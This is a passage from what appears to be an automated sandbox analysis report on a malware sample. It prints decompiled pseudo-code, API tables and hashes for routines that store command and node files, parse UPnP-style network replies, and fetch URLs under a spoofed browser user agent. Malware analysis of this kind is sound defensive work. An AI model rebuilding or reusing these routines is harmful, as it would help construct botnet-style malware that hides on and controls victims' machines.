                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x108)) = E00408A00(_a12, _a16);
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x10c)) = _a16;
                                                                                                                                                                                                                                                                  								E00408990( *((intOrPtr*)(_v24 + 0x100)));
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x104)) = _a16 - 0x100;
                                                                                                                                                                                                                                                                  								 *((intOrPtr*)(_v24 + 0x100)) = E0040A8A0( *((intOrPtr*)(_v24 + 0x104)), _v24 + 0x14, 0x14, _a12 + 0x100,  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                  								_push( *((intOrPtr*)(_v24 + 8)));
                                                                                                                                                                                                                                                                  								E004059C0( *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 4)),  *((intOrPtr*)(_v24 + 0x100)),  *((intOrPtr*)(_v24 + 0x104)));
                                                                                                                                                                                                                                                                  								_t160 = _t160 + 0x3c;
                                                                                                                                                                                                                                                                  								_v13 = 1;
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								_v20 = _v20 + 1;
                                                                                                                                                                                                                                                                  								continue;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						__eflags = _v13 & 0x000000ff;
                                                                                                                                                                                                                                                                  						if((_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  							_t91 = E00404210(_a16, _v12, _a12, _a16, 1); // executed
                                                                                                                                                                                                                                                                  							_t160 = _t160 + 0x10;
                                                                                                                                                                                                                                                                  							__eflags = _t91 & 0x000000ff;
                                                                                                                                                                                                                                                                  							if((_t91 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								 *0x412f6c = 0;
                                                                                                                                                                                                                                                                  								_v5 = 0;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						E00408990(_v12);
                                                                                                                                                                                                                                                                  						__eflags = _v5 & 0x000000ff;
                                                                                                                                                                                                                                                                  						if((_v5 & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                  							_t82 = CreateFileW("C:\Users\hardz\tbcmds.dat", 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                                                                                                                                                                                                  							_v28 = _t82;
                                                                                                                                                                                                                                                                  							__eflags = _v28 - 0xffffffff;
                                                                                                                                                                                                                                                                  							if(_v28 != 0xffffffff) {
                                                                                                                                                                                                                                                                  								_v32 = 0;
                                                                                                                                                                                                                                                                  								while(1) {
                                                                                                                                                                                                                                                                  									__eflags = _v32 -  *0x412f6c; // 0x1
                                                                                                                                                                                                                                                                  									if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  										break;
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_t87 =  *0x412f68; // 0x222c120
                                                                                                                                                                                                                                                                  									_t88 =  *0x412f68; // 0x222c120
                                                                                                                                                                                                                                                                  									WriteFile(_v28,  *(_t88 + 0x108 + _v32 * 0x110),  *(_t87 + 0x10c + _v32 * 0x110),  &_v36, 0); // executed
                                                                                                                                                                                                                                                                  									_t141 = _v32 + 1;
                                                                                                                                                                                                                                                                  									__eflags = _t141;
                                                                                                                                                                                                                                                                  									_v32 = _t141;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								FlushFileBuffers(_v28);
                                                                                                                                                                                                                                                                  								CloseHandle(_v28);
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				LeaveCriticalSection(0x412f50);
                                                                                                                                                                                                                                                                  				return _v5;
                                                                                                                                                                                                                                                                  			}






















                                                                                                                                                                                                                                                                  0x004046a8
                                                                                                                                                                                                                                                                  0x004046b1
                                                                                                                                                                                                                                                                  0x004046bb
                                                                                                                                                                                                                                                                  0x004046bf
                                                                                                                                                                                                                                                                  0x004046c4
                                                                                                                                                                                                                                                                  0x004046cc
                                                                                                                                                                                                                                                                  0x004046d6
                                                                                                                                                                                                                                                                  0x004046db
                                                                                                                                                                                                                                                                  0x004046de
                                                                                                                                                                                                                                                                  0x004046e5
                                                                                                                                                                                                                                                                  0x004046eb
                                                                                                                                                                                                                                                                  0x004046ef
                                                                                                                                                                                                                                                                  0x004046f3
                                                                                                                                                                                                                                                                  0x00404705
                                                                                                                                                                                                                                                                  0x00404708
                                                                                                                                                                                                                                                                  0x0040470e
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404723
                                                                                                                                                                                                                                                                  0x00404732
                                                                                                                                                                                                                                                                  0x00404741
                                                                                                                                                                                                                                                                  0x0040474d
                                                                                                                                                                                                                                                                  0x00404768
                                                                                                                                                                                                                                                                  0x00404774
                                                                                                                                                                                                                                                                  0x00404784
                                                                                                                                                                                                                                                                  0x00404798
                                                                                                                                                                                                                                                                  0x004047c6
                                                                                                                                                                                                                                                                  0x004047d2
                                                                                                                                                                                                                                                                  0x004047ee
                                                                                                                                                                                                                                                                  0x004047f3
                                                                                                                                                                                                                                                                  0x004047f6
                                                                                                                                                                                                                                                                  0x00404734
                                                                                                                                                                                                                                                                  0x00404702
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404702
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00404732
                                                                                                                                                                                                                                                                  0x00404805
                                                                                                                                                                                                                                                                  0x00404807
                                                                                                                                                                                                                                                                  0x00404817
                                                                                                                                                                                                                                                                  0x0040481c
                                                                                                                                                                                                                                                                  0x00404822
                                                                                                                                                                                                                                                                  0x00404824
                                                                                                                                                                                                                                                                  0x00404826
                                                                                                                                                                                                                                                                  0x00404830
                                                                                                                                                                                                                                                                  0x00404830
                                                                                                                                                                                                                                                                  0x00404824
                                                                                                                                                                                                                                                                  0x00404838
                                                                                                                                                                                                                                                                  0x00404844
                                                                                                                                                                                                                                                                  0x00404846
                                                                                                                                                                                                                                                                  0x00404860
                                                                                                                                                                                                                                                                  0x00404866
                                                                                                                                                                                                                                                                  0x00404869
                                                                                                                                                                                                                                                                  0x0040486d
                                                                                                                                                                                                                                                                  0x0040486f
                                                                                                                                                                                                                                                                  0x00404881
                                                                                                                                                                                                                                                                  0x00404884
                                                                                                                                                                                                                                                                  0x0040488a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040489b
                                                                                                                                                                                                                                                                  0x004048b1
                                                                                                                                                                                                                                                                  0x004048c2
                                                                                                                                                                                                                                                                  0x0040487b
                                                                                                                                                                                                                                                                  0x0040487b
                                                                                                                                                                                                                                                                  0x0040487e
                                                                                                                                                                                                                                                                  0x0040487e
                                                                                                                                                                                                                                                                  0x004048ce
                                                                                                                                                                                                                                                                  0x004048d8
                                                                                                                                                                                                                                                                  0x004048d8
                                                                                                                                                                                                                                                                  0x0040486d
                                                                                                                                                                                                                                                                  0x00404846
                                                                                                                                                                                                                                                                  0x004046e5
                                                                                                                                                                                                                                                                  0x004048e3
                                                                                                                                                                                                                                                                  0x004048f1

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00412F50,?,?,00000000,0040A267,006A0266,?,0040A283,00000000,0040B53C,?), ref: 004046B1
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tbcmds.dat,40000000,00000000,00000000,00000002,00000002,00000000,?,?,?,?,00000000,0040A267,006A0266), ref: 00404860
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(000000FF,?,?,00000000,00000000,?,?,?,?,00000000), ref: 004048C2
                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004048CE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF,?,?,?,?,00000000), ref: 004048D8
                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00412F50,?,?,00000000,0040A267,006A0266,?,0040A283,00000000,0040B53C,?), ref: 004048E3
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • C:\Users\user\tbcmds.dat, xrefs: 0040485B
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$CriticalSection$BuffersCloseCreateEnterFlushHandleLeaveWrite
                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\tbcmds.dat
                                                                                                                                                                                                                                                                  • API String ID: 2945370292-2662529796
                                                                                                                                                                                                                                                                  • Opcode ID: 30387370ddbcd65fe70cb0d1b2e70089a9f3de9cabe7a860cceefc8f9c3e6861
                                                                                                                                                                                                                                                                  • Instruction ID: 3207af2ea602bfb65b54bf45aa4f15af2ab48cc6669a523460d3cb6d0fbea14a
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 30387370ddbcd65fe70cb0d1b2e70089a9f3de9cabe7a860cceefc8f9c3e6861
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4771C0F5E002099BCB04DF94D985BEFB7B1BB88304F148579E644BB381C778A952CBA5
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 399 40c1b0-40c1ca 400 40c1db-40c1e2 399->400 401 40c294-40c29d 400->401 402 40c1e8-40c207 recvfrom 400->402 403 40c216-40c233 StrCmpNIA 402->403 404 40c209-40c214 Sleep 402->404 406 40c235-40c254 StrStrIA 403->406 407 40c28f 403->407 405 40c1cc-40c1d5 404->405 405->400 406->407 408 40c256-40c28d StrChrA call 40afb0 406->408 407->405 408->407
                                                                                                                                                                                                                                                                  C-Code - Quality: 79%
                                                                                                                                                                                                                                                                  			E0040C1B0(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                  				char _v1028;
                                                                                                                                                                                                                                                                  				char _v1029;
                                                                                                                                                                                                                                                                  				intOrPtr _v1036;
                                                                                                                                                                                                                                                                  				char* _v1040;
                                                                                                                                                                                                                                                                  				char* _v1044;
                                                                                                                                                                                                                                                                  				intOrPtr _t20;
                                                                                                                                                                                                                                                                  				intOrPtr _t29;
                                                                                                                                                                                                                                                                  				void* _t37;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_t20 = __eax;
                                                                                                                                                                                                                                                                  				_v1029 = 0;
                                                                                                                                                                                                                                                                  				_v1036 = 0;
                                                                                                                                                                                                                                                                  				while(_v1036 < 2) {
                                                                                                                                                                                                                                                                  					__imp__#17(_a4,  &_v1028, 0x400, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  					if(_t20 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						_v1029 = 1;
                                                                                                                                                                                                                                                                  						if(StrCmpNIA( &_v1028, "HTTP/1.1 200 OK", 0xf) == 0) {
                                                                                                                                                                                                                                                                  							_v1040 = StrStrIA( &_v1028, "LOCATION: ");
                                                                                                                                                                                                                                                                  							if(_v1040 != 0) {
                                                                                                                                                                                                                                                                  								_v1044 = _v1040 + 0xa;
                                                                                                                                                                                                                                                                  								_t29 = E0040AFB0(_v1044, _v1044, StrChrA(_v1044, 0xd) - _v1044);
                                                                                                                                                                                                                                                                  								_t37 = _t37 + 8;
                                                                                                                                                                                                                                                                  								 *_a8 = _t29;
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					} else {
                                                                                                                                                                                                                                                                  						Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t20 = _v1036 + 1;
                                                                                                                                                                                                                                                                  					_v1036 = _t20;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _v1029;
                                                                                                                                                                                                                                                                  			}











                                                                                                                                                                                                                                                                  0x0040c1b0
                                                                                                                                                                                                                                                                  0x0040c1b9
                                                                                                                                                                                                                                                                  0x0040c1c0
                                                                                                                                                                                                                                                                  0x0040c1db
                                                                                                                                                                                                                                                                  0x0040c1fe
                                                                                                                                                                                                                                                                  0x0040c207
                                                                                                                                                                                                                                                                  0x0040c216
                                                                                                                                                                                                                                                                  0x0040c233
                                                                                                                                                                                                                                                                  0x0040c247
                                                                                                                                                                                                                                                                  0x0040c254
                                                                                                                                                                                                                                                                  0x0040c25f
                                                                                                                                                                                                                                                                  0x0040c282
                                                                                                                                                                                                                                                                  0x0040c287
                                                                                                                                                                                                                                                                  0x0040c28d
                                                                                                                                                                                                                                                                  0x0040c28d
                                                                                                                                                                                                                                                                  0x0040c254
                                                                                                                                                                                                                                                                  0x0040c209
                                                                                                                                                                                                                                                                  0x0040c20e
                                                                                                                                                                                                                                                                  0x0040c20e
                                                                                                                                                                                                                                                                  0x0040c1d2
                                                                                                                                                                                                                                                                  0x0040c1d5
                                                                                                                                                                                                                                                                  0x0040c1d5
                                                                                                                                                                                                                                                                  0x0040c29d

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040C1FE
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040C20E
                                                                                                                                                                                                                                                                  • StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040C22B
                                                                                                                                                                                                                                                                  • StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040C241
                                                                                                                                                                                                                                                                  • StrChrA.SHLWAPI(?,0000000D), ref: 0040C26E
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Sleeprecvfrom
                                                                                                                                                                                                                                                                  • String ID: HTTP/1.1 200 OK$LOCATION:
                                                                                                                                                                                                                                                                  • API String ID: 668330359-3973262388
                                                                                                                                                                                                                                                                  • Opcode ID: 766efd74480ade401ae97df32cec916cef99da7e067a91872a851bbd2d4f1667
                                                                                                                                                                                                                                                                  • Instruction ID: 19bae495d964df930a5416a6b101112f45a73436487c04b08a4f8f7f296c2ab0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 766efd74480ade401ae97df32cec916cef99da7e067a91872a851bbd2d4f1667
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 382165B0940218DBDB30DF64DD85BA97774AB04308F1086F9E709BA5C1C6B859CA8F5C
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 411 40d160-40d184 InternetOpenA 412 40d186-40d1a3 InternetOpenUrlA 411->412 413 40d1f8-40d209 Sleep 411->413 414 40d1a5-40d1cc HttpQueryInfoA 412->414 415 40d1ee-40d1f2 InternetCloseHandle 412->415 416 40d1e4-40d1e8 InternetCloseHandle 414->416 417 40d1ce-40d1d6 414->417 415->413 416->415 417->416 418 40d1d8-40d1e0 417->418 418->416
                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E0040D160(char* _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				char _v9;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				void _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				void* _t21;
                                                                                                                                                                                                                                                                  				void* _t24;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				_v9 = 0;
                                                                                                                                                                                                                                                                  				_t21 = InternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36", 1, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  				_v16 = _t21;
                                                                                                                                                                                                                                                                  				if(_v16 != 0) {
                                                                                                                                                                                                                                                                  					_t24 = InternetOpenUrlA(_v16, _a4, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  					_v8 = _t24;
                                                                                                                                                                                                                                                                  					if(_v8 != 0) {
                                                                                                                                                                                                                                                                  						_v24 = 4;
                                                                                                                                                                                                                                                                  						HttpQueryInfoA(_v8, 0x20000005,  &_v20,  &_v24, 0);
                                                                                                                                                                                                                                                                  						if(_v20 > 0x1388 && _v20 !=  *_a8) {
                                                                                                                                                                                                                                                                  							 *_a8 = _v20;
                                                                                                                                                                                                                                                                  							_v9 = 1;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						InternetCloseHandle(_v8); // executed
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v16);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				Sleep(0x3e8); // executed
                                                                                                                                                                                                                                                                  				return _v9;
                                                                                                                                                                                                                                                                  			}










                                                                                                                                                                                                                                                                  0x0040d166
                                                                                                                                                                                                                                                                  0x0040d177
                                                                                                                                                                                                                                                                  0x0040d17d
                                                                                                                                                                                                                                                                  0x0040d184
                                                                                                                                                                                                                                                                  0x0040d196
                                                                                                                                                                                                                                                                  0x0040d19c
                                                                                                                                                                                                                                                                  0x0040d1a3
                                                                                                                                                                                                                                                                  0x0040d1a5
                                                                                                                                                                                                                                                                  0x0040d1bf
                                                                                                                                                                                                                                                                  0x0040d1cc
                                                                                                                                                                                                                                                                  0x0040d1de
                                                                                                                                                                                                                                                                  0x0040d1e0
                                                                                                                                                                                                                                                                  0x0040d1e0
                                                                                                                                                                                                                                                                  0x0040d1e8
                                                                                                                                                                                                                                                                  0x0040d1e8
                                                                                                                                                                                                                                                                  0x0040d1f2
                                                                                                                                                                                                                                                                  0x0040d1f2
                                                                                                                                                                                                                                                                  0x0040d1fd
                                                                                                                                                                                                                                                                  0x0040d209

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36,00000001,00000000,00000000,00000000), ref: 0040D177
                                                                                                                                                                                                                                                                  • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D196
                                                                                                                                                                                                                                                                  • HttpQueryInfoA.WININET(00000000,20000005,?,00000004,00000000), ref: 0040D1BF
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D1E8
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D1F2
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000003E8), ref: 0040D1FD
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36, xrefs: 0040D172
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandleOpen$HttpInfoQuerySleep
                                                                                                                                                                                                                                                                  • String ID: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  • API String ID: 2743515581-922322672
                                                                                                                                                                                                                                                                  • Opcode ID: 9580dc84764a9631a1c584e1580e1d15ff9d3e5fb4ab9709a14850b64044bd1a
                                                                                                                                                                                                                                                                  • Instruction ID: 6415d18d8a99034fddaf571bd804c2e16c3977809638760880a7fb89b11d9709
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9580dc84764a9631a1c584e1580e1d15ff9d3e5fb4ab9709a14850b64044bd1a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7821FC74E40209EBDB20DF94CD49F9EB775AB48705F208475FA11BB2C0CBB56A48CB55
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                                                                                                                  			E00409380(void* __eax) {
                                                                                                                                                                                                                                                                  				void* _v8;
                                                                                                                                                                                                                                                                  				long _v12;
                                                                                                                                                                                                                                                                  				void* _v16;
                                                                                                                                                                                                                                                                  				signed int _v20;
                                                                                                                                                                                                                                                                  				long _v24;
                                                                                                                                                                                                                                                                  				signed int _t36;
                                                                                                                                                                                                                                                                  				void* _t38;
                                                                                                                                                                                                                                                                  				void* _t40;
                                                                                                                                                                                                                                                                  				signed int _t65;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				if( *0x4139e4 == 0) {
                                                                                                                                                                                                                                                                  					return __eax;
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				_t36 =  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  				_v12 = _t36 << 3;
                                                                                                                                                                                                                                                                  				_t38 = E00408840(_v12);
                                                                                                                                                                                                                                                                  				_v8 = _t38;
                                                                                                                                                                                                                                                                  				__eflags = _v8;
                                                                                                                                                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                                                                                                                                                  					_v20 = 0;
                                                                                                                                                                                                                                                                  					while(1) {
                                                                                                                                                                                                                                                                  						__eflags = _v20 -  *0x4139e4; // 0x200
                                                                                                                                                                                                                                                                  						if(__eflags >= 0) {
                                                                                                                                                                                                                                                                  							break;
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_v8 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v20 * 4)) + 4));
                                                                                                                                                                                                                                                                  						 *((intOrPtr*)(_v8 + 4 + _v20 * 8)) =  *((intOrPtr*)( *((intOrPtr*)(0x4139e8 + _v20 * 4)) + 8));
                                                                                                                                                                                                                                                                  						_t65 = _v20 + 1;
                                                                                                                                                                                                                                                                  						__eflags = _t65;
                                                                                                                                                                                                                                                                  						_v20 = _t65;
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					_t40 = CreateFileW("C:\Users\hardz\tbnds.dat", 0x40000000, 0, 0, 2, 2, 0); // executed
                                                                                                                                                                                                                                                                  					_v16 = _t40;
                                                                                                                                                                                                                                                                  					__eflags = _v16 - 0xffffffff;
                                                                                                                                                                                                                                                                  					if(_v16 != 0xffffffff) {
                                                                                                                                                                                                                                                                  						WriteFile(_v16, _v8, _v12,  &_v24, 0); // executed
                                                                                                                                                                                                                                                                  						FlushFileBuffers(_v16);
                                                                                                                                                                                                                                                                  						CloseHandle(_v16);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InterlockedExchange(0x4123b4, 0x3d);
                                                                                                                                                                                                                                                                  					return E00408990(_v8);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t38;
                                                                                                                                                                                                                                                                  			}












                                                                                                                                                                                                                                                                  0x0040938d
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409394
                                                                                                                                                                                                                                                                  0x0040939c
                                                                                                                                                                                                                                                                  0x004093a3
                                                                                                                                                                                                                                                                  0x004093ab
                                                                                                                                                                                                                                                                  0x004093ae
                                                                                                                                                                                                                                                                  0x004093b2
                                                                                                                                                                                                                                                                  0x004093b8
                                                                                                                                                                                                                                                                  0x004093ca
                                                                                                                                                                                                                                                                  0x004093cd
                                                                                                                                                                                                                                                                  0x004093d3
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x004093e8
                                                                                                                                                                                                                                                                  0x004093fe
                                                                                                                                                                                                                                                                  0x004093c4
                                                                                                                                                                                                                                                                  0x004093c4
                                                                                                                                                                                                                                                                  0x004093c7
                                                                                                                                                                                                                                                                  0x004093c7
                                                                                                                                                                                                                                                                  0x00409418
                                                                                                                                                                                                                                                                  0x0040941e
                                                                                                                                                                                                                                                                  0x00409421
                                                                                                                                                                                                                                                                  0x00409425
                                                                                                                                                                                                                                                                  0x00409439
                                                                                                                                                                                                                                                                  0x00409443
                                                                                                                                                                                                                                                                  0x0040944d
                                                                                                                                                                                                                                                                  0x0040944d
                                                                                                                                                                                                                                                                  0x0040945a
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00409469
                                                                                                                                                                                                                                                                  0x0040946f

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(C:\Users\user\tbnds.dat,40000000,00000000,00000000,00000002,00000002,00000000), ref: 00409418
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(000000FF,00000000,?,?,00000000), ref: 00409439
                                                                                                                                                                                                                                                                  • FlushFileBuffers.KERNEL32(000000FF), ref: 00409443
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040944D
                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(004123B4,0000003D), ref: 0040945A
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • C:\Users\user\tbnds.dat, xrefs: 00409413
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$BuffersCloseCreateExchangeFlushHandleInterlockedWrite
                                                                                                                                                                                                                                                                  • String ID: C:\Users\user\tbnds.dat
                                                                                                                                                                                                                                                                  • API String ID: 442028454-433873672
                                                                                                                                                                                                                                                                  • Opcode ID: 2ce688ee49558b70df954ccc9e83ca4e1fad600f304051d88a26734cb161b826
                                                                                                                                                                                                                                                                  • Instruction ID: 450f0bf4d3de1bd92049d4cdc0ad236695143bdb7d06a53e7e3c0e4889a3cbca
